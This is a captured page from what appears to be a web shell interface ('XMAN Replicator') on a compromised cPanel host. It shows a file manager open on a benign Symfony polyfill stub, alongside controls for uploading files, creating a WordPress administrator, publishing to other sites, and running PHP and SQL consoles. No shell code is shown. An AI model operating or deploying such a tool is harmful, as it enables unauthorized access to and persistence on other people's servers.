🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
opt
/
cpanel
/
ea-wappspector
/
vendor
/
symfony
/
polyfill-intl-normalizer
/
Resources
/
stubs
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwxr-xr-x
2024-09-09 11:45
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwxr-xr-x
2024-09-09 11:45
🔄
🗑️
🗑️📁
⬇️
🔒
Normalizer.php
404 B
-rw-r--r--
2024-09-09 11:45
✏️
🔄
🗑️
⬇️
🔒
Edit: Normalizer.php
<?php class Normalizer extends Symfony\Polyfill\Intl\Normalizer\Normalizer { /** * @deprecated since ICU 56 and removed in PHP 8 */ public const NONE = 2; public const FORM_D = 4; public const FORM_KD = 8; public const FORM_C = 16; public const FORM_KC = 32; public const NFD = 4; public const NFKD = 8; public const NFC = 16; public const NFKC = 32; }
Save
PHP Console
Execute
SQL Console
Execute